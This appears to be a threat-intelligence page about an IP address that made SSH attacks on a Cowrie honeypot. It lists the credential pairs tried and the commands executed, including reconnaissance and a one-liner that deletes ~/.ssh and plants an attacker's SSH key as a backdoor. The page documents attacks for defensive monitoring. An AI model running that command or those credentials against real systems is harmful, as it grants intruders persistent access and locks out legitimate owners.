Active Threat โ€ข HIGH

120.48.170.78

First Detection1/25/2026
Last Activity2/21/2026
ISPBeijing Baidu Netcom Science and Technology Co., Ltd.
๐ŸŽฏ
360
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
22
Malware

Geolocation

Country
๐Ÿ‡จ๐Ÿ‡ณ China
City
Beijing
ASN
AS38365
ISP
Beijing Baidu Netcom Science and Technology Co., Ltd.

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

๐Ÿ”345gs5662d34/345gs5662d34
3x
๐Ÿ”deployer/deployer!
1x
๐Ÿ”lol/lol
1x
๐Ÿ”root/Talent123
1x
๐Ÿ”root/3245gs5662d34
1x
๐Ÿ”n8n/123456
1x
๐Ÿ”wireguard/root
1x
๐Ÿ”lol/3245gs5662d34
1x
๐Ÿ”erick/erick
1x
๐Ÿ”root/hola
1x
๐Ÿ”redis1/re123abc
1x
๐Ÿ”paulina/paulina
1x
๐Ÿ”useradmin/useradmin@123
1x
๐Ÿ”scheduler/123456
1x
๐Ÿ”factorio/1234
1x

Executed Commands

$Enter new UNIX password:4x
$uname3x
$which ls3x
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'3x
$w3x
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'3x
$uname -a3x
$lockr -ia .ssh3x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~3x
$uname -m3x

Risk Assessment

65
/100
LowMediumHighCritical